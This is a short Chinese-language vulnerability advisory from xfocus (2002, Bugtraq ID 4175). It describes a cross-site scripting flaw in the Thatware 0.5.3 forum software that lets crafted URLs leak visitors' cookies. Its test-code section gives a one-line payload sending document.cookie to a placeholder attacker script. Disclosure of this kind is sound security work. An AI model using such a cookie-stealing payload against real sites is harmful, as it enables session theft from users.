xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Thatware存在跨站脚本可执行漏洞


发布时间:2002-02-28
更新时间:2002-02-28
严重程度:
威胁程度:服务器信息泄露
错误类型:输入验证错误
利用方式:服务器模式

BUGTRAQ ID:4175

受影响系统
Thatware Thatware 0.5.3
详细描述
Thatware 是一款BBS系统类似Slashcode论坛系统。

其中远程用户可以通过构建插入脚本命令的URL到显示的页面,如果用户使用此
连接,就可以导致用户的COOKIE信息等被泄露。

测试代码
http://hax0 r/stealcookie.php%3Fcookie='+document.cookie'

解决方案
尚无

相关信息
参考:http://www.hackinthebox.org/article.php?sid=5494
相关主页:http://thatware.org/